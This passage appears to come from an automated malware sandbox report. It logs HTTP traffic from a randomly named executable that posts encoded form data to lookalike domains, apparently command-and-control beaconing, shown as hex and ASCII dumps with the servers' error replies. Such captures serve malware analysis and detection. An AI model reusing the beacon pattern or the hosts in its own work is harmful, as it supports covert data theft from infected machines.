                                                                                Referer: http://www.everythlngict.org/hxjq/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 49 6c 49 35 34 49 41 57 57 68 7a 68 45 64 58 57 36 56 42 52 36 77 70 6c 32 63 61 33 35 70 38 77 4f 78 59 51 67 37 44 55 4e 58 74 47 47 73 45 55 6b 66 45 68 51 6e 35 46 53 34 36 69 55 78 59 2f 33 46 6d 65 67 32 6c 2f 45 72 32 59 73 33 42 58 7a 45 38 49 78 62 36 76 53 7a 58 50 38 39 63 75 77 71 70 4e 5a 75 56 54 6f 41 49 6e 33 55 37 47 5a 62 51 31 4c 38 47 39 6a 4c 4b 45 59 57 67 6d 70 57 36 6a 43 79 77 78 72 58 79 71 75 37 62 6e 72 49 47 75 4c 2b 67 4a 57 52 66 5a 35 4d 64 30 50 4e 78 59 64 53 4c 48 30 32 50 31 45 37 68 51 71 53 63 44 72 2f 54 78 47 77 6a 6e 41 49 45 70 2b 38 46 2b 6f 51 4c 72 72 31 52 32 69 46 55 5a 74 43 59 32 4d 46 52 76 7a 46 47 79 4b 63 64 71 42 64 6b 47 30 63 3d
                                                                                Data Ascii: GhEtuH=MIlI54IAWWhzhEdXW6VBR6wpl2ca35p8wOxYQg7DUNXtGGsEUkfEhQn5FS46iUxY/3Fmeg2l/Er2Ys3BXzE8Ixb6vSzXP89cuwqpNZuVToAIn3U7GZbQ1L8G9jLKEYWgmpW6jCywxrXyqu7bnrIGuL+gJWRfZ5Md0PNxYdSLH02P1E7hQqScDr/TxGwjnAIEp+8F+oQLrr1R2iFUZtCY2MFRvzFGyKcdqBdkG0c=
                                                                                Dec 4, 2024 15:33:05.293071985 CET1236INHTTP/1.1 404
                                                                                Server: ZGS
                                                                                Date: Wed, 04 Dec 2024 14:33:05 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                                Set-Cookie: csrfc=6284747a-e160-4690-9d3d-a35ccdcf76b7;path=/;priority=high
                                                                                Set-Cookie: _zcsr_tmp=6284747a-e160-4690-9d3d-a35ccdcf76b7;path=/;SameSite=Strict;priority=high
                                                                                Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                vary: accept-encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 35 37 38 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 c8 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 89 02 49 d7 71 83 fd f7 1d 52 b2 ad 0b d5 64 7d 9a dd c0 a2 78 78 6e df 77 0e c9 26 af ee 3f dd fd fe e7 6f bf a0 42 95 6c f3 43 d2 fc 20 84 92 82 e0 cc 3c e9 41 49 14 46 15 2e c9 da 11 7c cb 95 74 50 ca 2b 45 2a b5 76 2a 4e ab 8c 3c 5e a3 8a e7 9c 31 7e d0 4f 58 a4 05 fd 42 f4 a3 ac 68 5d 13 e5 20 ef ac 4e 51 c5 c8 e6 2f 5e f0 c4 6b 9e 4f 33 8c 56 0f 48 1d 6b 30 a4 c8 a3 f2 52 09 a6 04 61 6b 47 aa 23 23 b2 20 5a 53 21 48 be 76 bc 03 d9 e6 e0 85 fc 90 e3 92 b2 e3 fa 53 4d aa 1f 3f e3 4a c6 0b df bf be f1 7d e7 ac d7 ac 3e 8d e0 b3 e5 d9 f1 e9 32 84 8f d6 e4 36 8a 62 47 6b 42 5a 93 73 8d 24 fc b8 92 08 9a df 8e 17 48 fa 95 c4 f3 79 fd d8 9f 2b b1 d8 d1 2a f6 e1 3d ea 4d d4 38 cb 68 b5 b3 cc 6c 71 fa b0 13 7c 5f 65 6e ca 19 17 f1 55 1e e9 6f 47 f1 3f 97 c7 99 e2 f5 9d 16 93 4f 13 5a 62 e4 96 fc ab 0b 09 25 58 b8 3b 81 33 0a 70 bd 65 24 57 d7 e8 [TRUNCATED]
                                                                                Data Ascii: 578X[o6~`h%+v:{%"BIqRd}xxnw&?oBlC <AIF.|tP+E*v*N<^1~OXBh] NQ/^kO3VHk0RakG## ZS!HvSM?J}>26bGkBZs$Hy+*=M8hlq|_enUoG?OZb%X;3pe$W*0Csx 2b}38=}i5.~DxmAPqEiul"xhiU3Ou.?;3\dD=z;1"f_&BQp d&_9XH0:eo_Bt1ai\hs3[MvBpQATv+f2Li})FeSB 46sKX]'OD^jeUi&gro{Q!
                                                                                Dec 4, 2024 15:33:05.293180943 CET732INData Raw: 53 c4 9a 0a 2c 9c 82 4b 17 f9 f7 c0 f1 22 50 9f cb f7 ac 11 80 7d f6 69 3a 27 30 db dd e4 ba cb 33 ae 9b 66 d3 69 06 1a da ee a3 7b f8 7d 34 b5 de ac a6 55 ce 27 ca c4 24 7c 31 5d 6a e7 f5 88 51 34 d4 d1 85 fd e6 1b 90 69 b6 02 6e 83 69 46 25 ac
                                                                                Data Ascii: S,K"P}i:'03fi{}4U'$|1]jQ4iniF%HoE^@%9dY-phmrQY3D2>|qMqCK9mwqzmtK(9t8jJIz?f;li9T`-I{`yH<|$v[F


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.749988136.143.186.12807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:06.713494062 CET1795OUTPOST /hxjq/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.everythlngict.org
                                                                                Origin: http://www.everythlngict.org
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.everythlngict.org/hxjq/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 49 6c 49 35 34 49 41 57 57 68 7a 68 45 64 58 57 36 56 42 52 36 77 70 6c 32 63 61 33 35 70 38 77 4f 78 59 51 67 37 44 55 4e 66 74 47 31 30 45 53 31 66 45 7a 41 6e 35 4d 79 34 37 69 55 78 5a 2f 33 64 69 65 67 71 62 2f 47 44 32 5a 4e 58 42 51 43 45 38 42 78 62 36 74 53 7a 44 42 63 39 7a 75 77 36 6c 4e 64 43 56 54 6f 41 49 6e 31 4d 37 50 6f 62 51 7a 4c 38 42 38 6a 4c 57 54 49 57 62 6d 6f 2b 4d 6a 43 2f 48 78 62 33 79 71 4b 66 62 71 34 77 47 6e 4c 2b 69 49 57 52 39 5a 35 49 34 30 50 41 4b 59 63 33 67 48 7a 43 50 35 67 61 4b 48 72 4b 71 58 4a 6a 38 35 33 34 51 76 68 73 69 6a 38 67 63 2b 66 41 43 31 61 70 6b 33 52 5a 35 54 71 54 4f 67 4e 6f 6a 32 48 78 54 69 4b 4a 6a 78 43 70 33 45 68 71 6c 6f 41 35 4d 6d 75 4b 45 75 78 45 45 49 71 2f 6e 73 52 52 7a 71 66 74 30 66 58 41 74 4d 6f 70 44 58 31 4e 67 4d 70 59 6b 72 43 66 75 63 47 36 51 49 36 57 76 46 65 42 4a 44 50 42 6b 71 32 36 7a 66 55 2b 38 52 6d 41 57 77 54 2f 6c 50 73 33 65 47 6b 61 72 37 72 50 4e 6c 62 36 4a 68 39 76 37 33 70 6b [TRUNCATED]
                                                                                Data Ascii: GhEtuH=MIlI54IAWWhzhEdXW6VBR6wpl2ca35p8wOxYQg7DUNftG10ES1fEzAn5My47iUxZ/3diegqb/GD2ZNXBQCE8Bxb6tSzDBc9zuw6lNdCVToAIn1M7PobQzL8B8jLWTIWbmo+MjC/Hxb3yqKfbq4wGnL+iIWR9Z5I40PAKYc3gHzCP5gaKHrKqXJj8534Qvhsij8gc+fAC1apk3RZ5TqTOgNoj2HxTiKJjxCp3EhqloA5MmuKEuxEEIq/nsRRzqft0fXAtMopDX1NgMpYkrCfucG6QI6WvFeBJDPBkq26zfU+8RmAWwT/lPs3eGkar7rPNlb6Jh9v73pkZO/NgoxO4TDRvw1duXlJZZaeweB+EqksHfJMH/QSS10MchjpL2F1QQFB30+8M7sv/HV2dSJEDYLkKTTyWqq4RQ5Zg8Dh0DnD5e8HbjiVC4mwQcfvKUGm7c8tXqOmNlEJzL8jn2HiP7BhSR5GZcRyUaCY9rwkdnTLkBQy3eQa3mKG8nz9iLek84L35q30XiJA6TrRspFp3F+yXBlXlgGi4S6DIZGUzJWPuhJdVmZJIf3I57vHQYbFIqs5dR7sL047/5Ln1tx/FkPnpr6WFWdTjU6FJfOzmFdbwPd1yMdcVyFS2+nF12ih/qRHbwbllYIPRQooLq18rpusyOLFhjy9SJblfsZ7uhOkOjF8gNkqts0/UZkaEfpXmh80TddP1AV/wL5mhqNrHyNM12eafng4mgEk1gdWqjCHU778blo6gRT3WOlUYxsJvapeSIAo0BMK/qh/JmQTAU17KLJONREmrWzdNF+V1o3lnmZ1LZbBT5fJl/FUcCegntHSTz0xP44NMxSXrw8p20EXfEQB75gOJR+TtzyyvaiyhVKxfvaYd+mTIxOUZPb00kcWP0FgVcscbCePyItoy3r1DLhLuaK//uYmM1iP4YpkXR7PVWZUe183XGP150mdgN5+zvhK8KBxLGK93U/jpYksPHkvBT94Rabqh8nknMaS9B [TRUNCATED]
                                                                                Dec 4, 2024 15:33:07.994160891 CET549INHTTP/1.1 400
                                                                                Server: ZGS
                                                                                Date: Wed, 04 Dec 2024 14:33:07 GMT
                                                                                Content-Type: text/html;charset=ISO-8859-1
                                                                                Content-Length: 80
                                                                                Connection: close
                                                                                Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
                                                                                Set-Cookie: csrfc=3f29aa18-eee7-45f4-8586-45ec0353fe88;path=/;priority=high
                                                                                Set-Cookie: _zcsr_tmp=3f29aa18-eee7-45f4-8586-45ec0353fe88;path=/;SameSite=Strict;priority=high
                                                                                Set-Cookie: JSESSIONID=2E8ACC588748F6C3806256523C52DCB9; Path=/; HttpOnly
                                                                                Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                                                Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.749991136.143.186.12807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:09.372771978 CET495OUTGET /hxjq/?GhEtuH=BKNo6O8yWzEApXpxZdhvBLsS4mUhkJt064RYd0HbUq7fKEZlE0/hsCP6DjMyuX8dqHZGPQa4k2P/eM3nbiU+NzaMvzu4IfNUiCKwEJ3hTOhx8HANTpWY2e8g5zzoSZCTjrGp61nu9rmD&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.everythlngict.org
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:33:10.647532940 CET1236INHTTP/1.1 404
                                                                                Server: ZGS
                                                                                Date: Wed, 04 Dec 2024 14:33:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 4649
                                                                                Connection: close
                                                                                Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                                Set-Cookie: csrfc=b79df3d8-c33d-471b-b97a-ef230161dea9;path=/;priority=high
                                                                                Set-Cookie: _zcsr_tmp=b79df3d8-c33d-471b-b97a-ef230161dea9;path=/;SameSite=Strict;priority=high
                                                                                Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                vary: accept-encoding
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                                                Dec 4, 2024 15:33:10.647759914 CET224INData Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                                                Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{
                                                                                Dec 4, 2024 15:33:10.647766113 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 31 38 70 78 20 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 63 6f
                                                                                Data Ascii: margin-top:3px; padding:18px 0px; } .content{ background-color:#fff; border-radius:4px; border-left:1px solid #e9e9e9; border-right:1px solid #e9e9e9;
                                                                                Dec 4, 2024 15:33:10.648433924 CET1236INData Raw: 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 2d 69 6e 66 6f 7b 20 20 0a 20 20 20 20 20 20
                                                                                Data Ascii: omain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0; list-style:none;
                                                                                Dec 4, 2024 15:33:10.648441076 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 43 6f 6c 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20
                                                                                Data Ascii: } </style> </head> <body> <div class="topColors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <di
                                                                                Dec 4, 2024 15:33:10.648457050 CET7INData Raw: 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: /html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.749993172.67.192.207807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:16.198621035 CET774OUTPOST /8292/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Origin: http://www.3kw40881107247y.click
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.3kw40881107247y.click/8292/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 51 6c 6f 33 79 73 42 71 65 6f 55 79 75 65 39 73 70 62 4e 6f 49 6c 41 58 31 4c 64 4e 71 72 35 50 52 31 57 5a 46 70 4f 38 6b 4f 31 75 2b 37 50 7a 65 38 62 74 69 79 30 2f 59 2b 6b 68 6a 51 47 4f 4e 73 33 72 6d 69 6d 68 6d 77 55 51 33 75 72 33 54 52 6e 56 45 41 75 34 52 46 2b 37 6d 34 70 76 6a 64 37 49 42 52 76 2b 79 65 78 51 2f 75 43 52 42 47 4f 45 71 4b 41 4c 65 61 67 5a 37 75 78 30 63 6a 74 64 2b 66 33 35 77 43 63 53 63 4f 49 6c 76 6f 4c 50 72 37 53 39 61 6a 52 76 67 75 51 6b 57 33 4a 6d 43 70 2f 4c 4c 2f 51 59 49 36 32 31 52 4d 79 78 62 74 68 48 67 35 43 48 73 30 34 67 74 33 66 41 5a 64 71 42 32 56 48 59 6c 45 38 63 6e 51 3d 3d
                                                                                Data Ascii: GhEtuH=Qlo3ysBqeoUyue9spbNoIlAX1LdNqr5PR1WZFpO8kO1u+7Pze8btiy0/Y+khjQGONs3rmimhmwUQ3ur3TRnVEAu4RF+7m4pvjd7IBRv+yexQ/uCRBGOEqKALeagZ7ux0cjtd+f35wCcScOIlvoLPr7S9ajRvguQkW3JmCp/LL/QYI621RMyxbthHg5CHs04gt3fAZdqB2VHYlE8cnQ==
                                                                                Dec 4, 2024 15:33:17.332479954 CET927INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:17 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obGPbf5%2FgCZU2EXKF3T85S0EPaeGffiv0vGQObzmDsjtyx%2BWefqSOr%2FJTCo6WRhW7fA6qk62gOk5aH3GIXqpCnCLUNxOhULfG5I2nRrnGZyyoSn0Or0ZuLoNebI9znNqjrap30K%2FVWn4Akbw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82ba2ae74382-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=15135&min_rtt=15135&rtt_var=7567&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.749994172.67.192.207807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:19.075531006 CET794OUTPOST /8292/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Origin: http://www.3kw40881107247y.click
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.3kw40881107247y.click/8292/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 51 6c 6f 33 79 73 42 71 65 6f 55 79 74 2f 74 73 71 36 4e 6f 66 56 41 55 32 4c 64 4e 6c 4c 35 44 52 31 53 5a 46 73 33 6e 6b 63 52 75 77 2f 4c 7a 52 64 62 74 78 43 30 2f 4d 75 6c 72 6e 51 48 4d 4e 73 36 59 6d 6a 4b 68 6d 30 45 51 33 76 62 33 51 67 6e 55 45 51 75 36 45 31 2b 35 34 49 70 76 6a 64 37 49 42 52 72 51 79 65 5a 51 2f 2f 79 52 41 6a 36 48 32 36 41 45 55 36 67 5a 73 65 78 77 63 6a 74 37 2b 65 72 44 77 41 6b 53 63 4b 45 6c 76 5a 4c 4d 69 37 53 37 65 6a 51 4b 6f 63 6c 38 50 6d 38 56 4b 59 33 58 52 4f 5a 35 4e 4d 33 58 4c 75 2b 64 46 38 5a 38 6b 37 6d 78 37 53 6c 56 76 32 62 59 55 2f 65 67 70 69 69 79 6f 57 64 59 78 6b 68 4d 51 67 52 66 43 6b 6d 4e 4a 5a 34 35 67 6a 45 65 34 74 67 3d
                                                                                Data Ascii: GhEtuH=Qlo3ysBqeoUyt/tsq6NofVAU2LdNlL5DR1SZFs3nkcRuw/LzRdbtxC0/MulrnQHMNs6YmjKhm0EQ3vb3QgnUEQu6E1+54Ipvjd7IBRrQyeZQ//yRAj6H26AEU6gZsexwcjt7+erDwAkScKElvZLMi7S7ejQKocl8Pm8VKY3XROZ5NM3XLu+dF8Z8k7mx7SlVv2bYU/egpiiyoWdYxkhMQgRfCkmNJZ45gjEe4tg=
                                                                                Dec 4, 2024 15:33:20.113285065 CET929INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:19 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U38n6HSzl%2B1frqxmeiaxLCRCq8mwJ4UmeYPgrtmXUuk%2BootiumRM2XGx9aYD%2FyywcT1mXotLo%2Ba74nBovt%2BhkTwcvAL5yOC5BCgKCojzl9aFhTJVG%2FlULfaoaM7cakjUTq7HfA1sEIL0tCiu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82cb4b007c7c-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2127&rtt_var=1063&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.749995172.67.192.207807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:21.847820044 CET1807OUTPOST /8292/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Origin: http://www.3kw40881107247y.click
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.3kw40881107247y.click/8292/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 51 6c 6f 33 79 73 42 71 65 6f 55 79 74 2f 74 73 71 36 4e 6f 66 56 41 55 32 4c 64 4e 6c 4c 35 44 52 31 53 5a 46 73 33 6e 6b 63 5a 75 77 4d 44 7a 51 2b 7a 74 79 43 30 2f 50 75 6c 6d 6e 51 48 4e 4e 74 54 77 6d 6a 58 63 6d 32 4d 51 32 4e 6a 33 56 55 7a 55 58 77 75 36 47 31 2b 34 6d 34 70 41 6a 5a 66 45 42 52 37 51 79 65 5a 51 2f 39 71 52 4a 57 4f 48 6c 71 41 4c 65 61 67 56 37 75 78 59 63 69 46 46 2b 65 2f 54 77 77 45 53 63 75 6f 6c 2f 37 54 4d 74 37 53 35 53 44 51 6f 6f 63 35 64 50 6d 68 75 4b 59 44 74 52 4e 35 35 4f 62 71 51 52 73 4b 32 52 75 42 79 6c 70 43 4f 31 41 39 59 71 6e 76 63 53 73 69 53 6b 56 58 4d 70 6b 39 76 37 7a 49 4e 43 6d 63 76 45 57 6d 74 45 4a 64 67 38 79 4d 5a 73 61 69 30 4d 75 58 48 6e 38 66 52 58 34 30 42 71 61 4b 69 70 59 53 54 57 4f 79 79 35 67 36 58 6c 46 66 4b 71 64 66 35 36 73 39 68 77 48 76 6b 4b 64 4e 63 75 43 56 67 48 51 4b 6a 31 37 78 4e 52 44 6f 52 4b 64 4c 46 2b 67 4a 4b 67 46 52 75 45 4f 38 58 6b 78 58 66 6e 73 31 